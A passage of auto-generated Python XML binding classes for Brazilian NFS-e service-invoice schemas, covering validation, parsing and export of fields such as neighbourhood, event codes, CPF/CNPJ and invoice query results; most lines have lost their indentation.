raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'Versao')
self.Versao = ival_
# validate type tpVersao
self.validate_tpVersao(self.Versao)
# end class CabecalhoType
class tpBairroCompleto(GeneratedsSuper):
"""Informações do Bairro com o seu Tipo."""
subclass = None
superclass = None
def __init__(self, TipoBairro=None, NomeBairro=None):
self.original_tagname_ = None
self.TipoBairro = TipoBairro
self.validate_tpTipoBairro(self.TipoBairro)
self.NomeBairro = NomeBairro
self.validate_tpBairro(self.NomeBairro)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpBairroCompleto)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpBairroCompleto.subclass:
return tpBairroCompleto.subclass(*args_, **kwargs_)
else:
return tpBairroCompleto(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpTipoBairro(self, value):
# Validate type tpTipoBairro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 10:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoBairro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpTipoBairro' % {"value" : value.encode("utf-8")} )
def validate_tpBairro(self, value):
# Validate type tpBairro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpBairro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpBairro' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.TipoBairro is not None or
self.NomeBairro is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpBairroCompleto', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpBairroCompleto')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpBairroCompleto')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpBairroCompleto', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpBairroCompleto'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpBairroCompleto', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.TipoBairro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoBairro>%s</ns1:TipoBairro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoBairro), input_name='TipoBairro')), eol_))
if self.NomeBairro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NomeBairro>%s</ns1:NomeBairro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.NomeBairro), input_name='NomeBairro')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'TipoBairro':
TipoBairro_ = child_.text
TipoBairro_ = self.gds_validate_string(TipoBairro_, node, 'TipoBairro')
self.TipoBairro = TipoBairro_
# validate type tpTipoBairro
self.validate_tpTipoBairro(self.TipoBairro)
elif nodeName_ == 'NomeBairro':
NomeBairro_ = child_.text
NomeBairro_ = self.gds_validate_string(NomeBairro_, node, 'NomeBairro')
self.NomeBairro = NomeBairro_
# validate type tpBairro
self.validate_tpBairro(self.NomeBairro)
# end class tpBairroCompleto
class tpEvento(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Codigo=None, Descricao=None, ChaveRPS=None, ChaveNFe=None):
self.original_tagname_ = None
self.Codigo = Codigo
self.validate_tpCodigoEvento(self.Codigo)
self.Descricao = Descricao
self.validate_tpDescricaoEvento(self.Descricao)
self.ChaveRPS = ChaveRPS
self.ChaveNFe = ChaveNFe
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpEvento)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpEvento.subclass:
return tpEvento.subclass(*args_, **kwargs_)
else:
return tpEvento(*args_, **kwargs_)
factory = staticmethod(factory)
    def validate_tpCodigoEvento(self, value):
        # Validate type tpCodigoEvento, a restriction on xs:short.
        if value is not None and Validate_simpletypes_:
            value = str(value)  # pattern matching and encode() require a string
            if not self.gds_validate_simple_patterns(
                    self.validate_tpCodigoEvento_patterns_, value):
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCodigoEvento_patterns_, ))
    validate_tpCodigoEvento_patterns_ = [['^[0-9]{3,4}$']]
def validate_tpDescricaoEvento(self, value):
# Validate type tpDescricaoEvento, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 300:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpDescricaoEvento' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpDescricaoEvento' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.Codigo is not None or
self.Descricao is not None or
self.ChaveRPS is not None or
self.ChaveNFe is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpEvento', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpEvento')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpEvento')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpEvento', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpEvento'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpEvento', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Codigo is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Codigo>%s</ns1:Codigo>%s' % (self.gds_format_integer(self.Codigo, input_name='Codigo'), eol_))
if self.Descricao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Descricao>%s</ns1:Descricao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.Descricao), input_name='Descricao')), eol_))
if self.ChaveRPS is not None:
self.ChaveRPS.export(outfile, level, namespace_, name_='ChaveRPS', pretty_print=pretty_print)
if self.ChaveNFe is not None:
self.ChaveNFe.export(outfile, level, namespace_, name_='ChaveNFe', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Codigo':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'Codigo')
self.Codigo = ival_
# validate type tpCodigoEvento
self.validate_tpCodigoEvento(self.Codigo)
elif nodeName_ == 'Descricao':
Descricao_ = child_.text
Descricao_ = self.gds_validate_string(Descricao_, node, 'Descricao')
self.Descricao = Descricao_
# validate type tpDescricaoEvento
self.validate_tpDescricaoEvento(self.Descricao)
elif nodeName_ == 'ChaveRPS':
obj_ = tpChaveRPS.factory()
obj_.build(child_)
self.ChaveRPS = obj_
obj_.original_tagname_ = 'ChaveRPS'
elif nodeName_ == 'ChaveNFe':
obj_ = tpChaveNFe.factory()
obj_.build(child_)
self.ChaveNFe = obj_
obj_.original_tagname_ = 'ChaveNFe'
# end class tpEvento
class tpCPFCNPJ2(GeneratedsSuper):
"""Tipo que representa um CPF/CNPJ."""
subclass = None
superclass = None
def __init__(self, CPF=None, CNPJ=None):
self.original_tagname_ = None
self.CPF = CPF
self.validate_tpCPF(self.CPF)
self.CNPJ = CNPJ
self.validate_tpCNPJ(self.CNPJ)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpCPFCNPJ2)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpCPFCNPJ2.subclass:
return tpCPFCNPJ2.subclass(*args_, **kwargs_)
else:
return tpCPFCNPJ2(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpCPF(self, value):
# Validate type tpCPF, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCPF_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCPF_patterns_, ))
validate_tpCPF_patterns_ = [['^[0-9]{0}$|^[0-9]{11}$']]
def validate_tpCNPJ(self, value):
# Validate type tpCNPJ, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCNPJ_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCNPJ_patterns_, ))
validate_tpCNPJ_patterns_ = [['^[0-9]{14}$']]
def hasContent_(self):
if (
self.CPF is not None or
self.CNPJ is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpCPFCNPJ2', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpCPFCNPJ2')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpCPFCNPJ2')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpCPFCNPJ2', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpCPFCNPJ2'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpCPFCNPJ2', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.CPF is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPF>%s</ns1:CPF>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPF), input_name='CPF')), eol_))
if self.CNPJ is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CNPJ>%s</ns1:CNPJ>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CNPJ), input_name='CNPJ')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'CPF':
CPF_ = child_.text
CPF_ = self.gds_validate_string(CPF_, node, 'CPF')
self.CPF = CPF_
# validate type tpCPF
self.validate_tpCPF(self.CPF)
elif nodeName_ == 'CNPJ':
CNPJ_ = child_.text
CNPJ_ = self.gds_validate_string(CNPJ_, node, 'CNPJ')
self.CNPJ = CNPJ_
# validate type tpCNPJ
self.validate_tpCNPJ(self.CNPJ)
# end class tpCPFCNPJ2
class tpConsultaNFSe(GeneratedsSuper):
"""NFSe de retorno de consulta."""
subclass = None
superclass = None
def __init__(self, InscricaoPrestador=None, NumeroNFe=None, CodigoVerificacao=None, SerieRPS=None, NumeroRPS=None, DataEmissaoRPS=None, RazaoSocialPrestador=None, TipoRecolhimento=None, ValorDeduzir=None, ValorTotal=None, Aliquota=None):
self.original_tagname_ = None
self.InscricaoPrestador = InscricaoPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
self.NumeroNFe = NumeroNFe
self.validate_tpNumero(self.NumeroNFe)
self.CodigoVerificacao = CodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
self.SerieRPS = SerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
self.NumeroRPS = NumeroRPS
self.validate_tpNumero(self.NumeroRPS)
if isinstance(DataEmissaoRPS, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(DataEmissaoRPS, '%Y-%m-%dT%H:%M:%S')
else:
initvalue_ = DataEmissaoRPS
self.DataEmissaoRPS = initvalue_
self.RazaoSocialPrestador = RazaoSocialPrestador
self.validate_tpRazaoSocial(self.RazaoSocialPrestador)
self.TipoRecolhimento = TipoRecolhimento
self.validate_tpTipoRecolhimento(self.TipoRecolhimento)
self.ValorDeduzir = ValorDeduzir
self.validate_tpValor(self.ValorDeduzir)
self.ValorTotal = ValorTotal
self.validate_tpValor(self.ValorTotal)
self.Aliquota = Aliquota
self.validate_tpAliquota(self.Aliquota)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpConsultaNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpConsultaNFSe.subclass:
return tpConsultaNFSe.subclass(*args_, **kwargs_)
else:
return tpConsultaNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
    def validate_tpInscricaoMunicipal(self, value):
        # Validate type tpInscricaoMunicipal, a restriction on xs:long.
        if value is not None and Validate_simpletypes_:
            value = str(value)  # pattern matching and encode() require a string
            if not self.gds_validate_simple_patterns(
                    self.validate_tpInscricaoMunicipal_patterns_, value):
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
    validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
    def validate_tpNumero(self, value):
        # Validate type tpNumero, a restriction on xs:long.
        if value is not None and Validate_simpletypes_:
            if value < 0:
                warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
            if value > 2147483647:
                warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
            value = str(value)  # pattern matching and encode() require a string
            if not self.gds_validate_simple_patterns(
                    self.validate_tpNumero_patterns_, value):
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
    validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpCodigoVerificacao(self, value):
# Validate type tpCodigoVerificacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 255:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
def validate_tpSerieRPS(self, value):
# Validate type tpSerieRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['NF']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpSerieRPS' % {"value" : value.encode("utf-8")} )
def validate_tpDataHora(self, value):
# Validate type tpDataHora, a restriction on xs:dateTime.
if value is not None and Validate_simpletypes_:
pass
def validate_tpRazaoSocial(self, value):
# Validate type tpRazaoSocial, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 120:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
def validate_tpTipoRecolhimento(self, value):
# Validate type tpTipoRecolhimento, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['A', 'R']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpTipoRecolhimento' % {"value" : value.encode("utf-8")} )
    def validate_tpValor(self, value):
        # Validate type tpValor, a restriction on xs:decimal.
        if value is not None and Validate_simpletypes_:
            if value < 0:
                warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpValor' % {"value" : value} )
            if len(str(value)) >= 15:
                warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpValor' % {"value" : value} )
            value = str(value)  # pattern matching and encode() require a string
            if not self.gds_validate_simple_patterns(
                    self.validate_tpValor_patterns_, value):
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpValor_patterns_, ))
    validate_tpValor_patterns_ = [['^0$|^0\\.[0-9]{2}$|^[1-9]{1}[0-9]{0,12}(\\.[0-9]{0,2})?$']]
def validate_tpAliquota(self, value):
# Validate type tpAliquota, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpAliquota' % {"value" : value} )
if len(str(value)) >= 6:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpAliquota' % {"value" : value} )
def hasContent_(self):
if (
self.InscricaoPrestador is not None or
self.NumeroNFe is not None or
self.CodigoVerificacao is not None or
self.SerieRPS is not None or
self.NumeroRPS is not None or
self.DataEmissaoRPS is not None or
self.RazaoSocialPrestador is not None or
self.TipoRecolhimento is not None or
self.ValorDeduzir is not None or
self.ValorTotal is not None or
self.Aliquota is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpConsultaNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpConsultaNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpConsultaNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpConsultaNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpConsultaNFSe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpConsultaNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.InscricaoPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoPrestador>%s</ns1:InscricaoPrestador>%s' % (self.gds_format_integer(self.InscricaoPrestador, input_name='InscricaoPrestador'), eol_))
if self.NumeroNFe is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNFe>%s</ns1:NumeroNFe>%s' % (self.gds_format_integer(self.NumeroNFe, input_name='NumeroNFe'), eol_))
if self.CodigoVerificacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CodigoVerificacao>%s</ns1:CodigoVerificacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CodigoVerificacao), input_name='CodigoVerificacao')), eol_))
if self.SerieRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SerieRPS>%s</ns1:SerieRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SerieRPS), input_name='SerieRPS')), eol_))
if self.NumeroRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroRPS>%s</ns1:NumeroRPS>%s' % (self.gds_format_integer(self.NumeroRPS, input_name='NumeroRPS'), eol_))
if self.DataEmissaoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataEmissaoRPS>%s</ns1:DataEmissaoRPS>%s' % (self.gds_format_datetime(self.DataEmissaoRPS, input_name='DataEmissaoRPS'), eol_))
if self.RazaoSocialPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:RazaoSocialPrestador>%s</ns1:RazaoSocialPrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.RazaoSocialPrestador), input_name='RazaoSocialPrestador')), eol_))
if self.TipoRecolhimento is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoRecolhimento>%s</ns1:TipoRecolhimento>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoRecolhimento), input_name='TipoRecolhimento')), eol_))
if self.ValorDeduzir is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorDeduzir>%s</ns1:ValorDeduzir>%s' % (self.gds_format_float(self.ValorDeduzir, input_name='ValorDeduzir'), eol_))
if self.ValorTotal is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorTotal>%s</ns1:ValorTotal>%s' % (self.gds_format_float(self.ValorTotal, input_name='ValorTotal'), eol_))
if self.Aliquota is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Aliquota>%s</ns1:Aliquota>%s' % (self.gds_format_float(self.Aliquota, input_name='Aliquota'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'InscricaoPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoPrestador')
self.InscricaoPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
elif nodeName_ == 'NumeroNFe':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNFe')
self.NumeroNFe = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroNFe)
elif nodeName_ == 'CodigoVerificacao':
CodigoVerificacao_ = child_.text
CodigoVerificacao_ = self.gds_validate_string(CodigoVerificacao_, node, 'CodigoVerificacao')
self.CodigoVerificacao = CodigoVerificacao_
# validate type tpCodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
elif nodeName_ == 'SerieRPS':
SerieRPS_ = child_.text
SerieRPS_ = self.gds_validate_string(SerieRPS_, node, 'SerieRPS')
self.SerieRPS = SerieRPS_
# validate type tpSerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
elif nodeName_ == 'NumeroRPS':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroRPS')
self.NumeroRPS = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroRPS)
elif nodeName_ == 'DataEmissaoRPS':
sval_ = child_.text
dval_ = self.gds_parse_datetime(sval_)
self.DataEmissaoRPS = dval_
# validate type tpDataHora
self.validate_tpDataHora(self.DataEmissaoRPS)
elif nodeName_ == 'RazaoSocialPrestador':
RazaoSocialPrestador_ = child_.text
RazaoSocialPrestador_ = self.gds_validate_string(RazaoSocialPrestador_, node, 'RazaoSocialPrestador')
self.RazaoSocialPrestador = RazaoSocialPrestador_
# validate type tpRazaoSocial
self.validate_tpRazaoSocial(self.RazaoSocialPrestador)
elif nodeName_ == 'TipoRecolhimento':
TipoRecolhimento_ = child_.text
TipoRecolhimento_ = self.gds_validate_string(TipoRecolhimento_, node, 'TipoRecolhimento')
self.TipoRecolhimento = TipoRecolhimento_
# validate type tpTipoRecolhimento
self.validate_tpTipoRecolhimento(self.TipoRecolhimento)
elif nodeName_ == 'ValorDeduzir':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorDeduzir')
self.ValorDeduzir = fval_
# validate type tpValor
self.validate_tpValor(self.ValorDeduzir)
elif nodeName_ == 'ValorTotal':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorTotal')
self.ValorTotal = fval_
# validate type tpValor
self.validate_tpValor(self.ValorTotal)
elif nodeName_ == 'Aliquota':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'Aliquota')
self.Aliquota = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.Aliquota)
# end class tpConsultaNFSe
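def _example_build_tpConsultaNFSe():
    # Illustrative sketch (not part of the generated bindings): parse a
    # minimal XML fragment into a tpConsultaNFSe through the generated
    # factory()/build() machinery. The fragment and its values are
    # placeholder assumptions for demonstration only.
    import xml.etree.ElementTree as etree_example_
    xml = (
        '<tpConsultaNFSe>'
        '<InscricaoPrestador>12345678</InscricaoPrestador>'
        '<NumeroNFe>42</NumeroNFe>'
        '</tpConsultaNFSe>'
    )
    obj = tpConsultaNFSe.factory()
    obj.build(etree_example_.fromstring(xml))
    return obj  # obj.InscricaoPrestador == 12345678, obj.NumeroNFe == 42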
class tpChaveNFeRPS(GeneratedsSuper):
"""Tipo que representa a chave de uma NFSe e a Chave do RPS que a mesma
substitui."""
subclass = None
superclass = None
def __init__(self, ChaveNFe=None, ChaveRPS=None):
self.original_tagname_ = None
self.ChaveNFe = ChaveNFe
self.ChaveRPS = ChaveRPS
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpChaveNFeRPS)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpChaveNFeRPS.subclass:
return tpChaveNFeRPS.subclass(*args_, **kwargs_)
else:
return tpChaveNFeRPS(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.ChaveNFe is not None or
self.ChaveRPS is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpChaveNFeRPS', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpChaveNFeRPS')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpChaveNFeRPS')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpChaveNFeRPS', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpChaveNFeRPS'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpChaveNFeRPS', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.ChaveNFe is not None:
self.ChaveNFe.export(outfile, level, namespace_, name_='ChaveNFe', pretty_print=pretty_print)
if self.ChaveRPS is not None:
self.ChaveRPS.export(outfile, level, namespace_, name_='ChaveRPS', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'ChaveNFe':
obj_ = tpChaveNFe.factory()
obj_.build(child_)
